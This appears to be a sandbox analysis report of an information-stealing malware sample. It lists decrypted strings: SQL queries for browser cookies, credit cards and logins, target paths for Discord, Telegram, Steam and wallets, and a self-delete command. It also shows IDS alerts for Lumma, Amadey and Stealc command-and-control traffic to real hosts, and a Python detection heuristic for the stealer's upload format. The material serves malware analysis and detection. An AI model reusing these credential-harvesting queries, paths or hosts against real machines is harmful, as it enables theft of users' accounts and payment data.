Source: 28.2.num.exe.e80000.0.unpack String decryptor: OperaGX
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Network
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: .txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: TRUE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: FALSE
Source: 28.2.num.exe.e80000.0.unpack String decryptor: autofill
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 28.2.num.exe.e80000.0.unpack String decryptor: history
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cc
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 28.2.num.exe.e80000.0.unpack String decryptor: name:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: month:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: year:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: card:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Login Data
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Web Data
Source: 28.2.num.exe.e80000.0.unpack String decryptor: History
Source: 28.2.num.exe.e80000.0.unpack String decryptor: logins.json
Source: 28.2.num.exe.e80000.0.unpack String decryptor: formSubmitURL
Source: 28.2.num.exe.e80000.0.unpack String decryptor: usernameField
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encryptedUsername
Source: 28.2.num.exe.e80000.0.unpack String decryptor: encryptedPassword
Source: 28.2.num.exe.e80000.0.unpack String decryptor: guid
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 28.2.num.exe.e80000.0.unpack String decryptor: cookies.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: formhistory.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: places.sqlite
Source: 28.2.num.exe.e80000.0.unpack String decryptor: plugins
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Local Extension Settings
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Sync Extension Settings
Source: 28.2.num.exe.e80000.0.unpack String decryptor: IndexedDB
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera Stable
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Opera GX Stable
Source: 28.2.num.exe.e80000.0.unpack String decryptor: CURRENT
Source: 28.2.num.exe.e80000.0.unpack String decryptor: chrome-extension_
Source: 28.2.num.exe.e80000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Local State
Source: 28.2.num.exe.e80000.0.unpack String decryptor: profiles.ini
Source: 28.2.num.exe.e80000.0.unpack String decryptor: chrome
Source: 28.2.num.exe.e80000.0.unpack String decryptor: opera
Source: 28.2.num.exe.e80000.0.unpack String decryptor: firefox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: wallets
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %08lX%04lX%lu
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ProductName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: x32
Source: 28.2.num.exe.e80000.0.unpack String decryptor: x64
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ProcessorNameString
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DisplayName
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DisplayVersion
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Network Info:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - IP: IP?
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Country: ISO?
Source: 28.2.num.exe.e80000.0.unpack String decryptor: System Summary:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - HWID:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - OS:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Architecture:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - UserName:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Computer Name:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Local Time:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - UTC:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Language:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Keyboards:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Laptop:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Running Path:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - CPU:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Threads:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Cores:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - RAM:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - Display Resolution:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: - GPU:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: User Agents:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Installed Apps:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: All Users:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Current User:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Process List:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: system_info.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: freebl3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: mozglue.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: msvcp140.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: nss3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: softokn3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: vcruntime140.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Temp\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: .exe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: runas
Source: 28.2.num.exe.e80000.0.unpack String decryptor: open
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /c start
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %DESKTOP%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %APPDATA%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %USERPROFILE%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %DOCUMENTS%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %PROGRAMFILES%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: %RECENT%
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.lnk
Source: 28.2.num.exe.e80000.0.unpack String decryptor: files
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \discord\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Local Storage\leveldb
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Telegram Desktop\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: key_datas
Source: 28.2.num.exe.e80000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: map*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: F8806DD0C461824F*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Telegram
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Tox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.tox
Source: 28.2.num.exe.e80000.0.unpack String decryptor: *.ini
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Password
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000001
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000002
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000003
Source: 28.2.num.exe.e80000.0.unpack String decryptor: 00000004
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Pidgin
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \.purple\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: accounts.xml
Source: 28.2.num.exe.e80000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 28.2.num.exe.e80000.0.unpack String decryptor: token:
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Software\Valve\Steam
Source: 28.2.num.exe.e80000.0.unpack String decryptor: SteamPath
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \config\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ssfn*
Source: 28.2.num.exe.e80000.0.unpack String decryptor: config.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DialogConfig.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: libraryfolders.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: loginusers.vdf
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Steam\
Source: 28.2.num.exe.e80000.0.unpack String decryptor: sqlite3.dll
Source: 28.2.num.exe.e80000.0.unpack String decryptor: browsers
Source: 28.2.num.exe.e80000.0.unpack String decryptor: done
Source: 28.2.num.exe.e80000.0.unpack String decryptor: soft
Source: 28.2.num.exe.e80000.0.unpack String decryptor: \Discord\tokens.txt
Source: 28.2.num.exe.e80000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 28.2.num.exe.e80000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 28.2.num.exe.e80000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 28.2.num.exe.e80000.0.unpack String decryptor: https
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 28.2.num.exe.e80000.0.unpack String decryptor: POST
Source: 28.2.num.exe.e80000.0.unpack String decryptor: HTTP/1.1
Source: 28.2.num.exe.e80000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 28.2.num.exe.e80000.0.unpack String decryptor: hwid
Source: 28.2.num.exe.e80000.0.unpack String decryptor: build
Source: 28.2.num.exe.e80000.0.unpack String decryptor: token
Source: 28.2.num.exe.e80000.0.unpack String decryptor: file_name
Source: 28.2.num.exe.e80000.0.unpack String decryptor: file
Source: 28.2.num.exe.e80000.0.unpack String decryptor: message
Source: 28.2.num.exe.e80000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 28.2.num.exe.e80000.0.unpack String decryptor: screenshot.jpg
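The decrypted strings above (Content-Type: multipart/form-data; boundary=----, the alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, POST, and the field names hwid, build, token, file_name, file, message plus screenshot.jpg) describe the shape of the stealer's upload request. The following is an added example, not code from the report or from the malware: it builds a multipart body of that shape from constructed field values, parses it back, and scores it with heuristics drawn from those strings. The exact request layout the stealer uses is an assumption made here; only the fragments listed above are taken from the report.

```python
import random
import re

# Pieces taken from the decrypted strings above: the "----" boundary prefix, the
# alphabet it is padded with, and the form field names hwid/build/token/
# file_name/file/message. How the stealer lays out the request is an assumption
# made for this example (build_multipart is not the stealer's code).
BOUNDARY_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
BOUNDARY_RE = re.compile(r"^----[A-Z0-9]{8,}$")
STEALC_FIELDS = {"hwid", "build", "token"}
_BOUNDARY_PARAM = re.compile(r'boundary=("?)([^";]+)\1')


def make_boundary(length=16, rng=random.Random(7)):
    """'----' followed by characters from the stealer's alphabet; the default rng
    is seeded only so the sample below is reproducible."""
    return "----" + "".join(rng.choice(BOUNDARY_ALPHABET) for _ in range(length))


def build_multipart(fields, boundary):
    """fields: iterable of (name, filename or None, bytes). Returns the body."""
    delim = b"--" + boundary.encode()
    body = b""
    for name, filename, data in fields:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        body += delim + b"\r\n" + disp.encode() + b"\r\n\r\n" + data + b"\r\n"
    return body + delim + b"--\r\n"


def parse_multipart(body, content_type):
    """Return {field name: (filename or None, raw bytes)} for a multipart body."""
    m = _BOUNDARY_PARAM.search(content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(2).encode()
    parts = {}
    # chunks[0] is the preamble (empty here) and chunks[-1] the closing "--\r\n"
    for chunk in body.split(delim)[1:-1]:
        chunk = chunk[2:-2]          # CRLF after the delimiter, CRLF before the next one
        headers, _, data = chunk.partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', headers)
        fname = re.search(rb'filename="([^"]*)"', headers)
        parts[name.group(1).decode()] = (fname.group(1).decode() if fname else None, data)
    return parts


def classify_exfil(method, path, content_type, body):
    """Heuristics derived from the decrypted strings; returns the reasons that fired."""
    reasons = []
    m = _BOUNDARY_PARAM.search(content_type) if method == "POST" else None
    if not m:
        return reasons
    if BOUNDARY_RE.match(m.group(2)):
        reasons.append("boundary is '----' plus upper-case alphanumerics only")
    parts = parse_multipart(body, content_type)
    if STEALC_FIELDS <= set(parts):
        reasons.append("form carries hwid, build and token fields")
    names = [parts["file"][0] or ""] if "file" in parts else []
    if "file_name" in parts:
        names.append(parts["file_name"][1].decode(errors="replace"))
    if any(re.search(r"screen", n, re.I) for n in names):
        reasons.append("uploaded file is named like a screenshot")
    if path.lower().endswith(".php"):
        reasons.append("posted to a .php gate (weak on its own)")
    return reasons


# Constructed sample request shaped after the strings above (not a real capture).
SAMPLE_BOUNDARY = make_boundary()
SAMPLE_FIELDS = [
    ("hwid", None, b"0123456789ABCDEF"),          # made-up host id
    ("build", None, b"default"),
    ("token", None, b"constructed-token"),
    ("file_name", None, b"screenshot.jpg"),
    ("file", "screenshot.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),  # JPEG magic + padding
    ("message", None, b""),
]
SAMPLE_CONTENT_TYPE = f"multipart/form-data; boundary={SAMPLE_BOUNDARY}"
SAMPLE_BODY = build_multipart(SAMPLE_FIELDS, SAMPLE_BOUNDARY)

if __name__ == "__main__":
    for reason in classify_exfil("POST", "/6c4adf523b719729.php", SAMPLE_CONTENT_TYPE, SAMPLE_BODY):
        print("-", reason)
```

The boundary check is the most specific of the four signals: browsers and common HTTP libraries use boundaries with mixed case or a recognisable prefix (WebKitFormBoundary, for instance), so a boundary that is four dashes followed only by upper-case letters and digits, combined with hwid/build/token fields, is a far tighter match than the .php path, which should never be alerted on alone.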
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58616 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58618 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58623 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58624 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58627 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58629 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58645 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:58647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58652 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58658 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58686 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58691 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58709 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999432818.0000000000192000.00000040.00000001.01000000.00000006.sdmp, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000003.1866208811.0000000005110000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Directory queried: number of queries: 1413
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Publishers
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\SolidDocuments
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\CEF
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking

Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63537 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:53325 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:58458 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:61756 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54763 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49792 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:55872 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:64014 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:64481 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:49516 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49808
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49860 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49868 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49878 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49890 -> 185.215.113.206:80
